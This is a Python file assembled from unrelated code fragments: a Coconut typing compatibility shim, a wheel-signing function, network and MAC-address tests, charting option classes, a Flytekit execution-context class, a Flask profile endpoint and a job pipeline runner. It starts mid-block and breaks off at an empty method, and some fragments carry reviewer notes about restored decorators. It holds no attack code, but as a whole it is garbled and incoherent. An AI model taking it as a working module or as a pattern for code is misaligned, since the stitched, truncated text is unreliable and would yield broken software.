    if (_coconut_sys.version_info < (3, 3)):
        abc = collections
    else:
        import collections.abc as abc
    # Build a `typing` module stand-in, preferring typing_extensions and
    # backfilling names missing on older Pythons with mocks/stubs.
    typing = types.ModuleType(_coconut_py_str('typing'))
    try:
        import typing_extensions
    except ImportError:
        typing_extensions = None
    else:
        for _name in dir(typing_extensions):
            if (not _name.startswith('__')):
                setattr(typing, _name, getattr(typing_extensions, _name))
        typing.__doc__ = ('Coconut version of typing that makes use of typing.typing_extensions when possible.\n\n' + (getattr(typing, '__doc__') or "The typing module is not available at runtime in Python 3.4 or earlier; try hiding your typedefs behind an 'if TYPE_CHECKING:' block."))
    if (_coconut_sys.version_info < (3, 5)):
        if (not hasattr(typing, 'TYPE_CHECKING')):
            typing.TYPE_CHECKING = False
        if (not hasattr(typing, 'Any')):
            typing.Any = Ellipsis
        if (not hasattr(typing, 'cast')):
            def cast(t, x):
                return x
            typing.cast = cast
            cast = staticmethod(cast)
        if (not hasattr(typing, 'TypeVar')):
            def TypeVar(name, *args, **kwargs):
                return name
            typing.TypeVar = TypeVar
            TypeVar = staticmethod(TypeVar)
        if (not hasattr(typing, 'Generic')):
            class Generic_mock(object):
                __slots__ = ()
                def __getitem__(self, vars):
                    return _coconut.object
            typing.Generic = Generic_mock()
    else:
        import typing as _typing
        for _name in dir(_typing):
            if (not hasattr(typing, _name)):
                setattr(typing, _name, getattr(_typing, _name))
    if (_coconut_sys.version_info < (3, 6)):
        if (not hasattr(typing, 'NamedTuple')):
            def NamedTuple(name, fields):
                return _coconut.collections.namedtuple(name, [x for (x, t) in fields])
            typing.NamedTuple = NamedTuple
            NamedTuple = staticmethod(NamedTuple)
    if (_coconut_sys.version_info < (3, 8)):
        if (not hasattr(typing, 'Protocol')):
            class YouNeedToInstallTypingExtensions(object):
                __slots__ = ()
                def __init__(self):
                    raise _coconut.TypeError('Protocols cannot be instantiated')
            typing.Protocol = YouNeedToInstallTypingExtensions
    if (_coconut_sys.version_info < (3, 10)):
        if (not hasattr(typing, 'ParamSpec')):
            def ParamSpec(name, *args, **kwargs):
                return _coconut.typing.TypeVar(name)
            typing.ParamSpec = ParamSpec
        if ((not hasattr(typing, 'TypeAlias')) or (not hasattr(typing, 'Concatenate'))):
            class you_need_to_install_typing_extensions(object):
                __slots__ = ()
            typing.TypeAlias = typing.Concatenate = you_need_to_install_typing_extensions()
    if (_coconut_sys.version_info < (3, 11)):
        if (not hasattr(typing, 'TypeVarTuple')):
            def TypeVarTuple(name, *args, **kwargs):
                return _coconut.typing.TypeVar(name)
            typing.TypeVarTuple = TypeVarTuple
        if (not hasattr(typing, 'Unpack')):
            class you_need_to_install_typing_extensions(object):
                __slots__ = ()
            typing.Unpack = you_need_to_install_typing_extensions()
        def _typing_getattr(name):
            raise _coconut.AttributeError(("typing.%s is not available on the current Python version and couldn't be looked up in typing_extensions; try hiding your typedefs behind an 'if TYPE_CHECKING:' block" % (name,)))
        typing.__getattr__ = _typing_getattr
        _typing_getattr = staticmethod(_typing_getattr)
    zip_longest = (itertools.zip_longest if (_coconut_sys.version_info >= (3,)) else itertools.izip_longest)
    try:
        import numpy
    except ImportError as numpy_import_err:
        numpy = _coconut_missing_module(numpy_import_err)
    else:
        abc.Sequence.register(numpy.ndarray)
    numpy_modules = ('numpy', 'torch', 'pandas', 'jaxlib')
    pandas_numpy_modules = ('pandas',)
    jax_numpy_modules = ('jaxlib',)
    tee_type = type(itertools.tee((), 1)[0])
    reiterables = (abc.Sequence, abc.Mapping, abc.Set)
    fmappables = (list, tuple, dict, set, frozenset)
    abc.Sequence.register(collections.deque)
    # Snapshot the builtins used by compiled code so later shadowing cannot
    # change their meaning; super/repr/print are wrapped in staticmethod so
    # attribute access on this class returns the plain callables.
    (Ellipsis, NotImplemented, NotImplementedError, Exception, AttributeError, ImportError, IndexError, KeyError, NameError, TypeError, ValueError, StopIteration, RuntimeError, all, any, bool, bytes, callable, classmethod, complex, dict, enumerate, filter, float, frozenset, getattr, hasattr, hash, id, int, isinstance, issubclass, iter, len, list, locals, globals, map, min, max, next, object, property, range, reversed, set, setattr, slice, str, sum, super, tuple, type, vars, zip, repr, print, bytearray) = (Ellipsis, NotImplemented, NotImplementedError, Exception, AttributeError, ImportError, IndexError, KeyError, NameError, TypeError, ValueError, StopIteration, RuntimeError, all, any, bool, bytes, callable, classmethod, complex, dict, enumerate, filter, float, frozenset, getattr, hasattr, hash, id, int, isinstance, issubclass, iter, len, list, locals, globals, map, min, max, next, object, property, range, reversed, set, setattr, slice, str, sum, staticmethod(super), tuple, type, vars, zip, staticmethod(repr), staticmethod(print), bytearray)
def sign(wheelfile, replace=False, get_keyring=get_keyring):
    """Add an ed25519 JWS signature (``RECORD.jws``) to *wheelfile*.

    The signing key is looked up by wheel name in the wheel keys store and
    its secret half is fetched from the system keyring.

    :raises WheelError: if the wheel already contains a signature entry.
    """
    warn_signatures()
    WheelKeys, keyring = get_keyring()
    ed25519ll = signatures.get_ed25519ll()
    wf = WheelFile(wheelfile, append=True)
    wk = WheelKeys().load()
    name = wf.parsed_filename.group('name')
    sign_with = wk.signers(name)[0]
    print('Signing {} with {}'.format(name, sign_with[1]))
    vk = sign_with[1]
    # Secret key is stored in the keyring under the verifying key.
    sk = keyring.get_keyring().get_password('wheel', vk)
    keypair = ed25519ll.Keypair(urlsafe_b64decode(binary(vk)),
                                urlsafe_b64decode(binary(sk)))
    record_name = wf.distinfo_name + '/RECORD'
    sig_name = wf.distinfo_name + '/RECORD.jws'
    if sig_name in wf.zipfile.namelist():
        raise WheelError('Wheel is already signed.')
    record_data = wf.zipfile.read(record_name)
    record_digest = urlsafe_b64encode(hashlib.sha256(record_data).digest())
    payload = {'hash': 'sha256=' + native(record_digest)}
    sig = signatures.sign(payload, keypair)
    wf.zipfile.writestr(sig_name, json.dumps(sig, sort_keys=True))
    wf.zipfile.close()
def init_arg():
    """Parse the command-line options for this driver script."""
    parser = argparse.ArgumentParser()
    # (flag, add_argument keyword options)
    option_table = (
        ('--exe', {'help': 'python interpreter to use'}),
        ('--it', {'default': 10000, 'type': int}),
        ('--kk', {'default': 1}),
        ('--alpha', {}),
        ('-o', {}),
        ('--projdir', {}),
        ('--verify', {'default': 1, 'type': int}),
    )
    for flag, kwargs in option_table:
        parser.add_argument(flag, **kwargs)
    return parser.parse_args()
def _translate_glob(pat):
    """Compile glob pattern *pat* into an anchored regex string.

    Each path component is translated separately, then the components are
    joined with a character class matching any supported path separator.
    """
    os_sep_class = '[%s]' % re.escape(SEPARATORS)
    translated_parts = [_translate_glob_part(part) for part in _iexplode_path(pat)]
    joined = _join_translated(translated_parts, os_sep_class)
    return '(?ms){res}\\Z'.format(res=joined)
class FaucetUntaggedACLMirrorDefaultAllowTest(FaucetUntaggedACLMirrorTest):
    # Same mirror-ACL scenario as the parent test, but the ACL rule sets no
    # explicit allow action, exercising the default-allow behaviour.
    CONFIG_GLOBAL = '\nvlans:\n 100:\n description: "untagged"\n unicast_flood: False\nacls:\n 1:\n - rule:\n actions:\n mirror: %(port_3)d\n'
    CONFIG = '\n interfaces:\n %(port_1)d:\n native_vlan: 100\n acl_in: 1\n %(port_2)d:\n native_vlan: 100\n acl_in: 1\n %(port_3)d:\n native_vlan: 100\n %(port_4)d:\n native_vlan: 100\n'
# NOTE(review): the decorator was truncated in this file (it read
# `.parametrize(...)`); restored to the standard pytest form, which the
# `(list_of_objects, expected_result)` signature requires.
@pytest.mark.parametrize(('list_of_objects', 'expected_result'), [([entry_1, entry_2], GRAPH_PART), ([entry_1, entry_2, entry_3], GRAPH_PART_SYMLINK)])
def test_create_graph_nodes_and_groups(list_of_objects, expected_result):
    """Graph construction yields the expected nodes/groups for each fixture."""
    assert (create_data_graph_nodes_and_groups(list_of_objects, WHITELIST) == expected_result)
class ProfileReport():
    """Node in a tree of call statistics.

    Each node records a call count and cumulative time (nanoseconds) and
    owns a mapping of named child reports; rendering attributes child time
    and reports any remainder as "unattributed".
    """
    calls: int
    total_time: int
    children: Dict[str, 'ProfileReport']
    parent: Optional['ProfileReport']

    def __init__(self) -> None:
        self.calls = 0
        self.total_time = 0
        self.children = {}
        self.parent = None

    def _to_string(self, indent: str) -> str:
        """Render this subtree, one line per child, at the given indent."""
        pieces = []
        attributed_time = 0
        for name, child in self.children.items():
            pieces.append(f'{indent}{name}:({child.calls}) {child.total_time // 1000000} ms\n')
            pieces.append(child._to_string(indent + ' '))
            attributed_time += child.total_time
        if self.parent is None:
            # Root: total is the sum of the direct children's time.
            pieces.append('Total time: ' + str(attributed_time // 1000000) + ' ms\n')
        elif self.children:
            leftover = self.total_time - attributed_time
            pieces.append(f'{indent}unattributed: {abs(leftover // 1000000)} ms\n')
        return ''.join(pieces)

    def __str__(self) -> str:
        return self._to_string('')
class OptionPlotoptionsFunnel3dLabel(Options):
    """Data-label options for funnel3d series.

    NOTE(review): each duplicated getter/setter pair in this file was
    clearly a property pair whose decorators were stripped (the second
    `def` would otherwise shadow the first); `@property` and
    `@<name>.setter` are restored so both accessors remain reachable.
    """

    @property
    def boxesToAvoid(self):
        return self._config_get(None)

    @boxesToAvoid.setter
    def boxesToAvoid(self, value: Any):
        self._config(value, js_type=False)

    @property
    def connectorAllowed(self):
        return self._config_get(False)

    @connectorAllowed.setter
    def connectorAllowed(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def connectorNeighbourDistance(self):
        return self._config_get(24)

    @connectorNeighbourDistance.setter
    def connectorNeighbourDistance(self, num: float):
        self._config(num, js_type=False)

    @property
    def enabled(self):
        return self._config_get(True)

    @enabled.setter
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def format(self):
        return self._config_get('undefined')

    @format.setter
    def format(self, text: str):
        self._config(text, js_type=False)

    @property
    def formatter(self):
        return self._config_get('undefined')

    @formatter.setter
    def formatter(self, value: Any):
        self._config(value, js_type=False)

    @property
    def maxFontSize(self):
        return self._config_get(None)

    @maxFontSize.setter
    def maxFontSize(self, num: float):
        self._config(num, js_type=False)

    @property
    def minFontSize(self):
        return self._config_get(None)

    @minFontSize.setter
    def minFontSize(self, num: float):
        self._config(num, js_type=False)

    @property
    def onArea(self):
        return self._config_get(None)

    @onArea.setter
    def onArea(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def style(self) -> 'OptionPlotoptionsFunnel3dLabelStyle':
        # Sub-configuration object; read-only accessor.
        return self._config_sub_data('style', OptionPlotoptionsFunnel3dLabelStyle)

    @property
    def useHTML(self):
        return self._config_get(False)

    @useHTML.setter
    def useHTML(self, flag: bool):
        self._config(flag, js_type=False)
class ExecutionParameters(object):
    """Runtime context handed to every task execution: execution date and
    id, stats, working directory, logging, checkpointing, decks and ad-hoc
    attributes.

    NOTE(review): decorator lines were stripped from this file — the bare
    `(init=False)` residue above `Builder` and the otherwise-shadowed
    duplicate accessor definitions show that `@dataclass(init=False)`,
    `@staticmethod` and `@property` decorators were originally present;
    they are restored below.
    """

    @dataclass(init=False)
    class Builder(object):
        # Mutable construction helper for ExecutionParameters.
        stats: taggable.TaggableStats
        attrs: typing.Dict[str, typing.Any]
        decks: List[Deck]
        raw_output_prefix: Optional[str] = None
        execution_id: typing.Optional[_identifier.WorkflowExecutionIdentifier] = None
        working_dir: typing.Optional[str] = None
        checkpoint: typing.Optional[Checkpoint] = None
        execution_date: typing.Optional[datetime] = None
        logging: Optional[_logging.Logger] = None
        task_id: typing.Optional[_identifier.Identifier] = None

        def __init__(self, current: typing.Optional[ExecutionParameters] = None):
            # Seed every field from *current* when given, else use empty defaults.
            self.stats = current.stats if current else None
            self.execution_date = current.execution_date if current else None
            self.working_dir = current.working_directory if current else None
            self.execution_id = current.execution_id if current else None
            self.logging = current.logging if current else None
            self.checkpoint = current._checkpoint if current else None
            self.decks = current._decks if current else []
            self.attrs = current._attrs if current else {}
            self.raw_output_prefix = current.raw_output_prefix if current else None
            self.task_id = current.task_id if current else None

        def add_attr(self, key: str, v: typing.Any) -> ExecutionParameters.Builder:
            self.attrs[key] = v
            return self

        def build(self) -> ExecutionParameters:
            # Materialize a plain working directory unless it is a managed temp dir.
            if self.working_dir and not isinstance(self.working_dir, utils.AutoDeletingTempDir):
                pathlib.Path(typing.cast(str, self.working_dir)).mkdir(parents=True, exist_ok=True)
            return ExecutionParameters(execution_date=self.execution_date, stats=self.stats, tmp_dir=self.working_dir, execution_id=self.execution_id, logging=self.logging, checkpoint=self.checkpoint, decks=self.decks, raw_output_prefix=self.raw_output_prefix, task_id=self.task_id, **self.attrs)

    @staticmethod
    def new_builder(current: Optional[ExecutionParameters] = None) -> Builder:
        return ExecutionParameters.Builder(current=current)

    def with_task_sandbox(self) -> Builder:
        """Return a Builder whose working directory (and checkpoint
        destination) live in a fresh per-task sandbox directory."""
        prefix = self.working_directory
        if isinstance(self.working_directory, utils.AutoDeletingTempDir):
            prefix = self.working_directory.name
        task_sandbox_dir = tempfile.mkdtemp(prefix=prefix)
        p = pathlib.Path(task_sandbox_dir)
        cp_dir = p.joinpath('__cp')
        cp_dir.mkdir(exist_ok=True)
        cp = SyncCheckpoint(checkpoint_dest=str(cp_dir))
        b = self.new_builder(self)
        b.checkpoint = cp
        b.working_dir = task_sandbox_dir
        return b

    def builder(self) -> Builder:
        return ExecutionParameters.Builder(current=self)

    def __init__(self, execution_date, tmp_dir, stats, execution_id: typing.Optional[_identifier.WorkflowExecutionIdentifier], logging, raw_output_prefix, output_metadata_prefix=None, checkpoint=None, decks=None, task_id: typing.Optional[_identifier.Identifier] = None, **kwargs):
        """Extra **kwargs become dynamic attributes served by __getattr__."""
        if decks is None:
            decks = []
        self._stats = stats
        self._execution_date = execution_date
        self._working_directory = tmp_dir
        self._execution_id = execution_id
        self._logging = logging
        self._raw_output_prefix = raw_output_prefix
        self._output_metadata_prefix = output_metadata_prefix
        self._attrs = kwargs
        self._secrets_manager = SecretsManager()
        self._checkpoint = checkpoint
        self._decks = decks
        self._task_id = task_id

    @property
    def stats(self) -> taggable.TaggableStats:
        return self._stats

    @property
    def logging(self) -> _logging.Logger:
        return self._logging

    @property
    def raw_output_prefix(self) -> str:
        return self._raw_output_prefix

    @property
    def output_metadata_prefix(self) -> str:
        return self._output_metadata_prefix

    @property
    def working_directory(self) -> str:
        return self._working_directory

    @property
    def execution_date(self) -> datetime:
        return self._execution_date

    @property
    def execution_id(self) -> _identifier.WorkflowExecutionIdentifier:
        return self._execution_id

    @property
    def task_id(self) -> typing.Optional[_identifier.Identifier]:
        return self._task_id

    @property
    def secrets(self) -> SecretsManager:
        return self._secrets_manager

    @property
    def checkpoint(self) -> Checkpoint:
        if self._checkpoint is None:
            raise NotImplementedError('Checkpointing is not available, please check the version of the platform.')
        return self._checkpoint

    @property
    def decks(self) -> typing.List:
        return self._decks

    @property
    def default_deck(self) -> Deck:
        from flytekit import Deck
        return Deck('default')

    @property
    def timeline_deck(self) -> 'TimeLineDeck':
        from flytekit.deck.deck import TimeLineDeck
        # Reuse an existing timeline deck if one was registered; otherwise
        # create a fresh (unregistered) one.
        time_line_deck = None
        for deck in self.decks:
            if isinstance(deck, TimeLineDeck):
                time_line_deck = deck
                break
        if time_line_deck is None:
            time_line_deck = TimeLineDeck('timeline')
        return time_line_deck

    def __getattr__(self, attr_name: str) -> typing.Any:
        # Dynamic attributes are stored upper-cased in self._attrs.
        attr_name = attr_name.upper()
        if self._attrs and (attr_name in self._attrs):
            return self._attrs[attr_name]
        raise AssertionError(f'{attr_name} not available as a parameter in Flyte context - are you in right task-type?')

    def has_attr(self, attr_name: str) -> bool:
        attr_name = attr_name.upper()
        if self._attrs and (attr_name in self._attrs):
            return True
        return False

    def get(self, key: str) -> typing.Any:
        return self.__getattr__(attr_name=key)
def _wasserstein_distance_norm(reference_data: pd.Series, current_data: pd.Series, feature_type: ColumnType, threshold: float) -> Tuple[(float, bool)]:
    """Normalized Wasserstein distance between the two samples.

    The raw distance is divided by the reference standard deviation
    (floored at 0.001 to avoid division by zero); drift is flagged when
    the normalized value reaches *threshold*.
    """
    denominator = max(np.std(reference_data), 0.001)
    score = stats.wasserstein_distance(reference_data, current_data) / denominator
    drift_detected = score >= threshold
    return (score, drift_detected)
def extractUminovelBlogspotCom(item):
    """Parse a feed *item* into a release message.

    Returns None for previews or items without volume/chapter info, a
    release message when a known tag matches, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    # (tag in feed, canonical series name, translation type)
    tagmap = [
        ('With contract Skill many Brides!', 'With contract Skill many Brides!', 'translated'),
        ('WCSB', 'With contract Skill many Brides!', 'translated'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def test_install_package(np_path):
    # Fresh project: no packages installed yet.
    assert (ethpm.get_installed_packages(np_path) == ([], []))
    ethpm.install_package(np_path, 'ipfs://testipfs-math')
    # The contract source was written out and the package is registered.
    assert np_path.joinpath('contracts/math/Math.sol').exists()
    assert (ethpm.get_installed_packages(np_path) == ([('math', '1.0.0')], []))
class OptionSeriesFunnelSonificationContexttracksActivewhen(Options):
    """activeWhen options for funnel sonification context tracks.

    NOTE(review): the duplicated getter/setter pairs in this file were
    property pairs whose decorators were stripped; `@property` /
    `@<name>.setter` are restored so both accessors remain reachable.
    """

    @property
    def crossingDown(self):
        return self._config_get(None)

    @crossingDown.setter
    def crossingDown(self, num: float):
        self._config(num, js_type=False)

    @property
    def crossingUp(self):
        return self._config_get(None)

    @crossingUp.setter
    def crossingUp(self, num: float):
        self._config(num, js_type=False)

    @property
    def max(self):
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def prop(self):
        return self._config_get(None)

    @prop.setter
    def prop(self, text: str):
        self._config(text, js_type=False)
class FlexibleTargeting(AbstractObject):
    """Ad targeting spec object exposing the flexible-targeting fields.

    NOTE(review): `_get_field_enum_info` takes `cls`, showing a stripped
    `@classmethod` decorator in this file; it is restored below.
    """

    def __init__(self, api=None):
        super(FlexibleTargeting, self).__init__()
        self._isFlexibleTargeting = True
        self._api = api

    class Field(AbstractObject.Field):
        # String constants naming every flexible-targeting field.
        behaviors = 'behaviors'
        college_years = 'college_years'
        connections = 'connections'
        custom_audiences = 'custom_audiences'
        education_majors = 'education_majors'
        education_schools = 'education_schools'
        education_statuses = 'education_statuses'
        ethnic_affinity = 'ethnic_affinity'
        family_statuses = 'family_statuses'
        friends_of_connections = 'friends_of_connections'
        generation = 'generation'
        home_ownership = 'home_ownership'
        home_type = 'home_type'
        home_value = 'home_value'
        household_composition = 'household_composition'
        income = 'income'
        industries = 'industries'
        interested_in = 'interested_in'
        interests = 'interests'
        life_events = 'life_events'
        moms = 'moms'
        net_worth = 'net_worth'
        office_type = 'office_type'
        politics = 'politics'
        relationship_statuses = 'relationship_statuses'
        user_adclusters = 'user_adclusters'
        work_employers = 'work_employers'
        work_positions = 'work_positions'

    # API type declaration for each field, used for (de)serialization.
    _field_types = {'behaviors': 'list<IDName>', 'college_years': 'list<unsigned int>', 'connections': 'list<IDName>', 'custom_audiences': 'list<IDName>', 'education_majors': 'list<IDName>', 'education_schools': 'list<IDName>', 'education_statuses': 'list<unsigned int>', 'ethnic_affinity': 'list<IDName>', 'family_statuses': 'list<IDName>', 'friends_of_connections': 'list<IDName>', 'generation': 'list<IDName>', 'home_ownership': 'list<IDName>', 'home_type': 'list<IDName>', 'home_value': 'list<IDName>', 'household_composition': 'list<IDName>', 'income': 'list<IDName>', 'industries': 'list<IDName>', 'interested_in': 'list<unsigned int>', 'interests': 'list<IDName>', 'life_events': 'list<IDName>', 'moms': 'list<IDName>', 'net_worth': 'list<IDName>', 'office_type': 'list<IDName>', 'politics': 'list<IDName>', 'relationship_statuses': 'list<unsigned int>', 'user_adclusters': 'list<IDName>', 'work_employers': 'list<IDName>', 'work_positions': 'list<IDName>'}

    @classmethod
    def _get_field_enum_info(cls):
        field_enum_info = {}
        return field_enum_info
class Test_mac(unittest.TestCase):
    """Tests for the `mac` hardware-address helper functions.

    NOTE(review): the bare `(AssertionError)` / `(ValueError)` residue
    lines in this file mark stripped `@raises(...)` decorators (nose);
    they are restored on the two negative tests below.
    """

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_mac_is_multicast(self):
        addr = b'\x01#Eg\x89\n'
        val = True
        res = mac.is_multicast(addr)
        eq_(val, res)

    def test_mac_haddr_to_str(self):
        addr = 'aa:aa:aa:aa:aa:aa'
        val = b'\xaa\xaa\xaa\xaa\xaa\xaa'
        res = mac.haddr_to_str(val)
        eq_(addr, res)

    def test_mac_haddr_to_str_none(self):
        # A None address is rendered as the string 'None'.
        addr = None
        val = 'None'
        res = mac.haddr_to_str(addr)
        eq_(val, res)

    @raises(AssertionError)
    def test_mac_haddr_to_str_assert(self):
        # 5-byte (truncated) binary address must be rejected.
        val = b'\xaa\xaa\xaa\xaa\xaa'
        res = mac.haddr_to_str(val)

    def test_mac_haddr_to_bin_false(self):
        addr = 'aa:aa:aa:aa:aa:aa'
        val = b'\xaa\xaa\xaa\xaa\xaa\xaa'
        res = mac.haddr_to_bin(addr)
        eq_(val, res)

    @raises(ValueError)
    def test_mac_haddr_to_bin_true(self):
        # Truncated textual address must be rejected.
        addr = 'aa:aa:aa:aa:aa'
        res = mac.haddr_to_bin(addr)

    def test_mac_haddr_bitand(self):
        addr = b'\xaa\xaa\xaa\xaa\xaa\xaa'
        mask = b'\xff\xff\xff\x00\x00\x00'
        val = b'\xaa\xaa\xaa\x00\x00\x00'
        res = mac.haddr_bitand(addr, mask)
        eq_(val, res)
class OptionSeriesBellcurveSonificationContexttracksMappingLowpass(Options):
    """Lowpass-filter mapping options for bellcurve sonification tracks.

    NOTE(review): these sub-data accessors follow the stripped-property
    pattern seen elsewhere in this file; `@property` is restored.
    """

    @property
    def frequency(self) -> 'OptionSeriesBellcurveSonificationContexttracksMappingLowpassFrequency':
        return self._config_sub_data('frequency', OptionSeriesBellcurveSonificationContexttracksMappingLowpassFrequency)

    @property
    def resonance(self) -> 'OptionSeriesBellcurveSonificationContexttracksMappingLowpassResonance':
        return self._config_sub_data('resonance', OptionSeriesBellcurveSonificationContexttracksMappingLowpassResonance)
class DecadePopupController(OptionsController):
    """Popup controller that filters the album model by release decade."""

    def __init__(self, plugin, album_model):
        super(DecadePopupController, self).__init__()
        self._album_model = album_model
        self.plugin = plugin
        self._spritesheet = None
        cl = CoverLocale()
        cl.switch_locale(cl.Locale.LOCALE_DOMAIN)
        # Map translated label -> [filter start year, spritesheet key];
        # -1 marks the pseudo-entries 'All Decades' and 'Older'.
        decade_table = (
            ('All Decades', -1),
            ('20s', 2020),
            ('10s', 2010),
            ('00s', 2000),
            ('90s', 1990),
            ('80s', 1980),
            ('70s', 1970),
            ('60s', 1960),
            ('50s', 1950),
            ('40s', 1940),
            ('30s', 1930),
            ('Older', -1),
        )
        self.values = OrderedDict()
        for label, year in decade_table:
            self.values[_(label)] = [year, label]
        self.options = list(self.values.keys())
        # Hide the 20s entry until that decade has actually started.
        if date.today().year < 2020:
            self.options.remove(_('20s'))
        self._initial_decade = self.options[0]
        self.update_images(False)
        self.current_key = self._initial_decade

    def update_images(self, *args):
        self._spritesheet = self.create_spritesheet(self.plugin, self._spritesheet, 'decade')
        if args[-1]:
            self.update_image = True

    def do_action(self):
        # The initial entry means "no filter"; anything else filters by year.
        if self.current_key == self._initial_decade:
            self._album_model.remove_filter('decade')
        else:
            self._album_model.replace_filter('decade', self.values[self.current_key][0])

    def get_current_image(self):
        sprite_key = self.values[self.current_key][1]
        return self._spritesheet[sprite_key]

    def get_current_description(self):
        return self.current_key
def test_get_sub_awards_csv_sources(db):
    """sub_awards downloads expand to exactly the d1 + d2 subaward sources."""
    original = VALUE_MAPPINGS['sub_awards']['filter_function']
    # BUG FIX: the mock was built with `returned_value`, a silently-ignored
    # MagicMock kwarg; the intended configuration is `return_value`.
    VALUE_MAPPINGS['sub_awards']['filter_function'] = MagicMock(return_value='')
    try:
        csv_sources = download_generation.get_download_sources({'download_types': ['sub_awards'], 'filters': {'award_type_codes': list(award_type_mapping.keys())}})
    finally:
        # Restore the real filter function even if the call above raises.
        VALUE_MAPPINGS['sub_awards']['filter_function'] = original
    assert (len(csv_sources) == 2)
    assert (csv_sources[0].file_type == 'd1')
    assert (csv_sources[0].source_type == 'sub_awards')
    assert (csv_sources[1].file_type == 'd2')
    assert (csv_sources[1].source_type == 'sub_awards')
class Profile(MethodView):
    """User-profile endpoint: view (GET) and update (POST) the current
    user's password and email.

    NOTE(review): the bare `_required` residue lines in this file mark
    stripped decorators; `@login_required` is restored on both views so
    the endpoint is not left unauthenticated.
    """

    @login_required
    def get(self):
        """Return the current user's username, admin flag and email."""
        result = {}
        try:
            result['user'] = current_user.username
            result['admin'] = current_user.is_admin
            result['email'] = current_user.email
        except AttributeError:
            abort(404)
        return (jsonify(result), 200)

    @login_required
    def post(self):
        """Validate the request body and update password and/or email."""
        try:
            marsh_schema = parse_json_schema().load(request.json)
            args = marsh_schema
        except ValidationError as errors:
            logger.debug('Validation error: {}'.format(errors))
            return (errors.messages, 500)
        logger.debug('Updating user details')
        user = User.query.filter_by(id=current_user.id).first()
        ret = []
        if isinstance(user, User) and ('password' in args):
            if args['password']:
                if ('new_password' in args) and ('confirm_password' in args):
                    if args['confirm_password'] and args['new_password']:
                        if args['new_password'] != args['confirm_password']:
                            return ({'msg': 'Passwords do not match'}, 400)
                        # Current password must verify before changing it.
                        if bcrypt.check_password_hash(user.password, args['password']):
                            pass_hash = bcrypt.generate_password_hash(args['new_password'])
                            user.password = pass_hash.decode('utf-8')
                            logger.debug('Updating password')
                            ret.append({'msg': 'Password updated'})
                            # Rotate the session after a credential change.
                            crackq.app.session_interface.regenerate(session)
                        else:
                            return ({'msg': 'Invalid Password'}, 401)
                if 'email' in args:
                    if args['email'] and email_check(args['email']):
                        # Email change also requires the current password.
                        if bcrypt.check_password_hash(user.password, args['password']):
                            user.email = args['email']
                            logger.debug('Updating email')
                            ret.append({'msg': 'Email updated'})
                        else:
                            return ({'msg': 'Invalid Password'}, 401)
        if ret:
            db.session.commit()
            return (jsonify(ret), 200)
        return ({'msg': 'Invalid Request'}, 500)
class PipelineRunner():
    """Run queued `Job`s with a bounded number of concurrent executions.

    Jobs are polled every `poll_interval` seconds; optional callbacks fire
    when a single job completes and when a whole named group of jobs has
    completed.
    """

    def __init__(self, runner, max_concurrent_jobs=4, poll_interval=30, jobCompletionHandler=None, groupCompletionHandler=None):
        # `runner` is the backend used to actually execute each Job.
        self.__runner = runner
        self.max_concurrent_jobs = max_concurrent_jobs
        self.poll_interval = poll_interval
        self.groups = []
        self.njobs_in_group = {}
        self.jobs = queue.Queue()
        self.running = []
        self.completed = []
        self.handle_job_completion = jobCompletionHandler
        self.handle_group_completion = groupCompletionHandler

    def queueJob(self, working_dir, script, script_args, label=None, group=None):
        """Add a job to the waiting queue, tracking group membership counts."""
        job_name = ((os.path.splitext(os.path.basename(script))[0] + '.') + str(label))
        if group:
            if (group not in self.groups):
                self.groups.append(group)
                self.njobs_in_group[group] = 1
            else:
                self.njobs_in_group[group] += 1
        self.jobs.put(Job(self.__runner, job_name, working_dir, script, script_args, label, group))
        logging.debug(('Added job: now %d jobs in pipeline' % self.jobs.qsize()))

    def nWaiting(self):
        """Number of jobs still queued."""
        return self.jobs.qsize()

    def nRunning(self):
        """Number of jobs currently executing."""
        return len(self.running)

    def nCompleted(self):
        """Number of jobs that have finished."""
        return len(self.completed)

    def isRunning(self):
        """Refresh job states, then report whether any work remains."""
        self.update()
        return ((self.nWaiting() > 0) or (self.nRunning() > 0))

    def run(self, blocking=True):
        """Start the pipeline; when *blocking*, poll until all jobs finish."""
        logging.debug('PipelineRunner: started')
        logging.debug(('Blocking mode : %s' % blocking))
        print(('Initially %d jobs waiting, %d running, %d finished' % (self.nWaiting(), self.nRunning(), self.nCompleted())))
        self.update()
        if blocking:
            while self.isRunning():
                time.sleep(self.poll_interval)
            print('Pipeline completed')

    def update(self):
        """Move finished jobs to `completed`, fire callbacks, and start
        queued jobs while below the concurrency limit."""
        updated_status = False
        # Iterate a reversed view so removal is safe while looping.
        for job in self.running[::(- 1)]:
            if (not job.isRunning()):
                self.running.remove(job)
                self.completed.append(job)
                updated_status = True
                print(('Job has completed: %s: %s %s (%s)' % (job.job_id, job.name, os.path.basename(job.working_dir), time.asctime(time.localtime(job.end_time)))))
                if self.handle_job_completion:
                    self.handle_job_completion(job)
                # Fire the group callback once every member has completed.
                if (job.group_label is not None):
                    jobs_in_group = []
                    for check_job in self.completed:
                        if (check_job.group_label == job.group_label):
                            jobs_in_group.append(check_job)
                    if (self.njobs_in_group[job.group_label] == len(jobs_in_group)):
                        print(("Group '%s' has completed" % job.group_label))
                        if self.handle_group_completion:
                            self.handle_group_completion(job.group_label, jobs_in_group)
            elif job.errorState():
                logging.warning(('Terminating job %s in error state' % job.job_id))
                job.terminate()
        # Top up running jobs from the queue, respecting the limit.
        while ((not self.jobs.empty()) and (self.nRunning() < self.max_concurrent_jobs)):
            next_job = self.jobs.get()
            next_job.start()
            self.running.append(next_job)
            updated_status = True
            print(('Job has started: %s: %s %s (%s)' % (next_job.job_id, next_job.name, os.path.basename(next_job.working_dir), time.asctime(time.localtime(next_job.start_time)))))
        if self.jobs.empty():
            logging.debug('PipelineRunner: all jobs now submitted')
        if updated_status:
            print(('Currently %d jobs waiting, %d running, %d finished' % (self.nWaiting(), self.nRunning(), self.nCompleted())))

    def report(self):
